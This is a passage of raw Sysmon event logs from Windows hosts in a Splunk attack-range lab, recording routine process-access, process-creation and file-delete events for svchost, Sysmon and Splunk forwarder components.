12:28:29.759{FE4C2B44-D9F5-63C7-0C00-00000000AF02}8326420C:\Windows\system32\svchost.exe{FE4C2B44-DA03-63C7-2000-00000000AF02}2452C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\KERNELBASE.dll+5ea44|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+7b183|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+538bc|C:\Windows\System32\RPCRT4.dll+35824|C:\Windows\System32\RPCRT4.dll+3473d|C:\Windows\System32\RPCRT4.dll+34feb|C:\Windows\System32\RPCRT4.dll+20ddc|C:\Windows\System32\RPCRT4.dll+2125c|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a50a|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000045916Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:28:29.759{FE4C2B44-D9F5-63C7-0C00-00000000AF02}8326420C:\Windows\system32\svchost.exe{FE4C2B44-DA03-63C7-2000-00000000AF02}2452C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\KERNELBASE.dll+5ea44|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+7b183|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+538bc|C:\Windows\System32\RPCRT4.dll+35824|C:\Windows\System32\RPCRT4.dll+3473d|C:\Windows\System32\RPCRT4.dll+34feb|C:\Windows\System32\RPCRT4.dll+20ddc|C:\Windows\System32\RPCRT4.dll+2125c|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a50a|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000045915Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:28:29.759{FE4C2B44-D9F3-63C7-0500-00000000AF02}4082524C:\Windows\system32\csrss.exe{FE4C2B44-E5ED-63C7-7906-00000000AF02}6180C:\Program Files\SplunkUniversalForwarder\bin\splunk-netmon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x800000000000000045914Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:28:29.759{FE4C2B44-DA67-63C7-AA00-00000000AF02}20924876C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe{FE4C2B44-E5ED-63C7-7906-00000000AF02}6180C:\Program Files\SplunkUniversalForwarder\bin\splunk-netmon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7424|C:\Windows\System32\KERNELBASE.dll+24890|C:\Windows\System32\KERNELBASE.dll+22e56|C:\Windows\System32\KERNEL32.DLL+1c373|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+e499f1|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+1b3255|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+1bd30d|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+1b59b6|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+dd3c14|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+1bd79a|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+1c0f1c|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+dd07d2|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+dd491d|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+1bb965|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+dc694e|C:\Windows\System32\ucrtbase.dll+1fb80|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 154100x800000000000000045913Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:28:29.760{FE4C2B44-E5ED-63C7-7906-00000000AF02}6180C:\Program Files\SplunkUniversalForwarder\bin\splunk-netmon.exe8.2.5Network monitorSplunk ApplicationSplunk Inc.splunk-netmon.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunk-netmon.exe"C:\Windows\system32\NT AUTHORITY\SYSTEM{FE4C2B44-D9F3-63C7-E703-000000000000}0x3e70SystemMD5=92BD3C71158FA8B9A0821D43564A56E7,SHA256=7850C91F8D08679D7A0579D350C08CA6F6EDEA8A12226ADC2E30B4ABF8CE0BE2,IMPHASH=FD2D4472615B421BAEF1D51F46EF5F52{FE4C2B44-DA67-63C7-AA00-00000000AF02}2092C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe" service 23542300x800000000000000045912Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:28:29.619{FE4C2B44-DA75-63C7-F400-00000000AF02}2900NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\ApplicationMD5=2D6D9D69A14D03C6334116B96F8E0DF1,SHA256=09D0CCA56663001FBB856BEBDAB934B2A929ED5EC5914E3B9EBDAAEAE39D5FF7,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 23542300x800000000000000045911Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:28:29.126{FE4C2B44-DA75-63C7-F400-00000000AF02}2900NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=5C51721DA1DCEF55DAB8896175DF8E2C,SHA256=137AC6801F7712E30CBAFAEF90163DF0A2F59F84F135697F584039DC12000D44,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 10341000x800000000000000018251Microsoft-Windows-Sysmon/Operationalwin-host-ctus-attack-range-933-2023-01-18 12:28:29.166{E5A8D418-DCC0-63C7-A300-00000000B002}9683180C:\Windows\system32\conhost.exe{E5A8D418-E5ED-63C7-2E02-00000000B002}660C:\Program Files\SplunkUniversalForwarder\bin\splunk-MonitorNoHandle.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\SYSTEM32\ConhostV2.dll+5ca7|C:\Windows\SYSTEM32\ConhostV2.dll+774b|C:\Windows\SYSTEM32\ConhostV2.dll+a8df|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000018250Microsoft-Windows-Sysmon/Operationalwin-host-ctus-attack-range-933-2023-01-18 12:28:29.166{E5A8D418-DC43-63C7-0C00-00000000B002}7283236C:\Windows\system32\svchost.exe{E5A8D418-DC44-63C7-1F00-00000000B002}1284C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\KERNELBASE.dll+5ea44|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+d3ae|C:\Windows\System32\RPCRT4.dll+7b183|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+538bc|C:\Windows\System32\RPCRT4.dll+35824|C:\Windows\System32\RPCRT4.dll+3473d|C:\Windows\System32\RPCRT4.dll+34feb|C:\Windows\System32\RPCRT4.dll+20ddc|C:\Windows\System32\RPCRT4.dll+2125c|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a50a|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000018249Microsoft-Windows-Sysmon/Operationalwin-host-ctus-attack-range-933-2023-01-18 12:28:29.166{E5A8D418-DC43-63C7-0C00-00000000B002}7283236C:\Windows\system32\svchost.exe{E5A8D418-DC44-63C7-1F00-00000000B002}1284C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\KERNELBASE.dll+5ea44|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+7b183|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+538bc|C:\Windows\System32\RPCRT4.dll+35824|C:\Windows\System32\RPCRT4.dll+3473d|C:\Windows\System32\RPCRT4.dll+34feb|C:\Windows\System32\RPCRT4.dll+20ddc|C:\Windows\System32\RPCRT4.dll+2125c|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a50a|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000018248Microsoft-Windows-Sysmon/Operationalwin-host-ctus-attack-range-933-2023-01-18 12:28:29.166{E5A8D418-DC43-63C7-0C00-00000000B002}7283236C:\Windows\system32\svchost.exe{E5A8D418-DC44-63C7-1F00-00000000B002}1284C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\KERNELBASE.dll+5ea44|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+7b183|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+538bc|C:\Windows\System32\RPCRT4.dll+35824|C:\Windows\System32\RPCRT4.dll+3473d|C:\Windows\System32\RPCRT4.dll+34feb|C:\Windows\System32\RPCRT4.dll+20ddc|C:\Windows\System32\RPCRT4.dll+2125c|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a50a|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000018247Microsoft-Windows-Sysmon/Operationalwin-host-ctus-attack-range-933-2023-01-18 12:28:29.166{E5A8D418-DC43-63C7-0C00-00000000B002}7283236C:\Windows\system32\svchost.exe{E5A8D418-DC44-63C7-1F00-00000000B002}1284C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\KERNELBASE.dll+5ea44|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+7b183|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+538bc|C:\Windows\System32\RPCRT4.dll+35824|C:\Windows\System32\RPCRT4.dll+3473d|C:\Windows\System32\RPCRT4.dll+34feb|C:\Windows\System32\RPCRT4.dll+20ddc|C:\Windows\System32\RPCRT4.dll+2125c|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a50a|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000018246Microsoft-Windows-Sysmon/Operationalwin-host-ctus-attack-range-933-2023-01-18 12:28:29.166{E5A8D418-DC43-63C7-0C00-00000000B002}7283236C:\Windows\system32\svchost.exe{E5A8D418-DC44-63C7-1F00-00000000B002}1284C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\KERNELBASE.dll+5ea44|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8fc1|c:\windows\system32\lsm.dll+8eb0|C:\Windows\System32\RPCRT4.dll+7b183|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+538bc|C:\Windows\System32\RPCRT4.dll+35824|C:\Windows\System32\RPCRT4.dll+3473d|C:\Windows\System32\RPCRT4.dll+34feb|C:\Windows\System32\RPCRT4.dll+20ddc|C:\Windows\System32\RPCRT4.dll+2125c|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a50a|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000018245Microsoft-Windows-Sysmon/Operationalwin-host-ctus-attack-range-933-2023-01-18 12:28:29.166{E5A8D418-DC43-63C7-0C00-00000000B002}7283236C:\Windows\system32\svchost.exe{E5A8D418-DC44-63C7-1F00-00000000B002}1284C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\KERNELBASE.dll+5ea44|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8e6f|C:\Windows\System32\RPCRT4.dll+7b183|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+538bc|C:\Windows\System32\RPCRT4.dll+35824|C:\Windows\System32\RPCRT4.dll+3473d|C:\Windows\System32\RPCRT4.dll+34feb|C:\Windows\System32\RPCRT4.dll+20ddc|C:\Windows\System32\RPCRT4.dll+2125c|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a50a|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000018244Microsoft-Windows-Sysmon/Operationalwin-host-ctus-attack-range-933-2023-01-18 12:28:29.166{E5A8D418-DC43-63C7-0C00-00000000B002}7283236C:\Windows\system32\svchost.exe{E5A8D418-DC44-63C7-1F00-00000000B002}1284C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\KERNELBASE.dll+5ea44|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+7b183|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+538bc|C:\Windows\System32\RPCRT4.dll+35824|C:\Windows\System32\RPCRT4.dll+3473d|C:\Windows\System32\RPCRT4.dll+34feb|C:\Windows\System32\RPCRT4.dll+20ddc|C:\Windows\System32\RPCRT4.dll+2125c|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a50a|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000018243Microsoft-Windows-Sysmon/Operationalwin-host-ctus-attack-range-933-2023-01-18 12:28:29.166{E5A8D418-DC43-63C7-0C00-00000000B002}7283236C:\Windows\system32\svchost.exe{E5A8D418-DC44-63C7-1F00-00000000B002}1284C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\KERNELBASE.dll+5ea44|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+7b183|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+538bc|C:\Windows\System32\RPCRT4.dll+35824|C:\Windows\System32\RPCRT4.dll+3473d|C:\Windows\System32\RPCRT4.dll+34feb|C:\Windows\System32\RPCRT4.dll+20ddc|C:\Windows\System32\RPCRT4.dll+2125c|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a50a|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000018242Microsoft-Windows-Sysmon/Operationalwin-host-ctus-attack-range-933-2023-01-18 12:28:29.166{E5A8D418-DC43-63C7-0C00-00000000B002}7283236C:\Windows\system32\svchost.exe{E5A8D418-DC44-63C7-1F00-00000000B002}1284C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\KERNELBASE.dll+5ea44|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+7b183|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+538bc|C:\Windows\System32\RPCRT4.dll+35824|C:\Windows\System32\RPCRT4.dll+3473d|C:\Windows\System32\RPCRT4.dll+34feb|C:\Windows\System32\RPCRT4.dll+20ddc|C:\Windows\System32\RPCRT4.dll+2125c|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a50a|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000018241Microsoft-Windows-Sysmon/Operationalwin-host-ctus-attack-range-933-2023-01-18 12:28:29.166{E5A8D418-DC43-63C7-0500-00000000B002}4163684C:\Windows\system32\csrss.exe{E5A8D418-E5ED-63C7-2E02-00000000B002}660C:\Program Files\SplunkUniversalForwarder\bin\splunk-MonitorNoHandle.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x800000000000000018240Microsoft-Windows-Sysmon/Operationalwin-host-ctus-attack-range-933-2023-01-18 12:28:29.166{E5A8D418-DCC0-63C7-9F00-00000000B002}30963280C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe{E5A8D418-E5ED-63C7-2E02-00000000B002}660C:\Program Files\SplunkUniversalForwarder\bin\splunk-MonitorNoHandle.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7424|C:\Windows\System32\KERNELBASE.dll+24890|C:\Windows\System32\KERNELBASE.dll+22e56|C:\Windows\System32\KERNEL32.DLL+1c373|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+e499f1|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+1b3255|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+1bd30d|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+1b59b6|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+dd3c14|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+1bd79a|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+1c0f1c|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+dd07d2|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+dd491d|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+1bb965|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+dc694e|C:\Windows\System32\ucrtbase.dll+1fb80|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 154100x800000000000000018239Microsoft-Windows-Sysmon/Operationalwin-host-ctus-attack-range-933-2023-01-18 12:28:29.166{E5A8D418-E5ED-63C7-2E02-00000000B002}660C:\Program Files\SplunkUniversalForwarder\bin\splunk-MonitorNoHandle.exe10.0.10011.16384SplunkMonNoHandle Control ProgramWindows (R) Win 7 DDK driverWindows (R) Win 7 DDK providerSplunkMonNoHandle.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunk-MonitorNoHandle.exe"C:\Windows\system32\NT AUTHORITY\SYSTEM{E5A8D418-DC43-63C7-E703-000000000000}0x3e70SystemMD5=679D3E04F6AB7B10FF27D06B29C27A12,SHA256=FF1B5220C99EA6173BE693E1C2D700873ADE2F8A73F503FC0D297EA0792756D1,IMPHASH=05D58741E22C6453F52C1A9326FAF02D{E5A8D418-DCC0-63C7-9F00-00000000B002}3096C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe" service 23542300x800000000000000045933Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:28:30.559{FE4C2B44-DA67-63C7-AA00-00000000AF02}2092NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunkd.exeC:\Program Files\SplunkUniversalForwarder\var\spool\splunk\tracker.logMD5=55B3329CA508C1CA0EC497F95736042E,SHA256=03ABE3A3217AFC163E89B5EC4BBEE91B56C271A31652ED9C08F367AF97E83A11,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 10341000x800000000000000045932Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:28:30.539{FE4C2B44-E5EE-63C7-7A06-00000000AF02}67645316C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe{FE4C2B44-DA67-63C7-AA00-00000000AF02}2092C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe0x101400C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\KERNELBASE.dll+2c44d|C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe+6ae795|C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe+6ae2c6|C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe+643d8|C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe+65dfc|C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe+9dcf50|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000045931Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:28:30.308{FE4C2B44-DA67-63C7-AE00-00000000AF02}49123668C:\Windows\system32\conhost.exe{FE4C2B44-E5EE-63C7-7A06-00000000AF02}6764C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\SYSTEM32\ConhostV2.dll+5ca7|C:\Windows\SYSTEM32\ConhostV2.dll+774b|C:\Windows\SYSTEM32\ConhostV2.dll+a8df|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000045930Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:28:30.308{FE4C2B44-D9F5-63C7-0C00-00000000AF02}8326420C:\Windows\system32\svchost.exe{FE4C2B44-DA03-63C7-2000-00000000AF02}2452C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\KERNELBASE.dll+5ea44|c:\windows\system32\lsm.dll+fd18|C:\Windows\System32\RPCRT4.dll+7b183|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+538bc|C:\Windows\System32\RPCRT4.dll+35824|C:\Windows\System32\RPCRT4.dll+3473d|C:\Windows\System32\RPCRT4.dll+34feb|C:\Windows\System32\RPCRT4.dll+20ddc|C:\Windows\System32\RPCRT4.dll+2125c|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a50a|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000045929Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:28:30.308{FE4C2B44-D9F5-63C7-0C00-00000000AF02}8326420C:\Windows\system32\svchost.exe{FE4C2B44-DA03-63C7-2000-00000000AF02}2452C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\KERNELBASE.dll+5ea44|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+7b183|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+538bc|C:\Windows\System32\RPCRT4.dll+35824|C:\Windows\System32\RPCRT4.dll+3473d|C:\Windows\System32\RPCRT4.dll+34feb|C:\Windows\System32\RPCRT4.dll+20ddc|C:\Windows\System32\RPCRT4.dll+2125c|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a50a|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000045928Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:28:30.308{FE4C2B44-D9F5-63C7-0C00-00000000AF02}8326420C:\Windows\system32\svchost.exe{FE4C2B44-DA03-63C7-2000-00000000AF02}2452C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\KERNELBASE.dll+5ea44|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+7b183|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+538bc|C:\Windows\System32\RPCRT4.dll+35824|C:\Windows\System32\RPCRT4.dll+3473d|C:\Windows\System32\RPCRT4.dll+34feb|C:\Windows\System32\RPCRT4.dll+20ddc|C:\Windows\System32\RPCRT4.dll+2125c|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a50a|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000045927Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:28:30.308{FE4C2B44-D9F5-63C7-0C00-00000000AF02}8326420C:\Windows\system32\svchost.exe{FE4C2B44-DA03-63C7-2000-00000000AF02}2452C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\KERNELBASE.dll+5ea44|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+7b183|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+538bc|C:\Windows\System32\RPCRT4.dll+35824|C:\Windows\System32\RPCRT4.dll+3473d|C:\Windows\System32\RPCRT4.dll+34feb|C:\Windows\System32\RPCRT4.dll+20ddc|C:\Windows\System32\RPCRT4.dll+2125c|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a50a|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000045926Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:28:30.308{FE4C2B44-D9F3-63C7-0500-00000000AF02}408424C:\Windows\system32\csrss.exe{FE4C2B44-E5EE-63C7-7A06-00000000AF02}6764C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x800000000000000045925Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:28:30.308{FE4C2B44-DA67-63C7-AA00-00000000AF02}20924876C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe{FE4C2B44-E5EE-63C7-7A06-00000000AF02}6764C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7424|C:\Windows\System32\KERNELBASE.dll+24890|C:\Windows\System32\KERNELBASE.dll+22e56|C:\Windows\System32\KERNEL32.DLL+1c373|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+e499f1|C:\Program 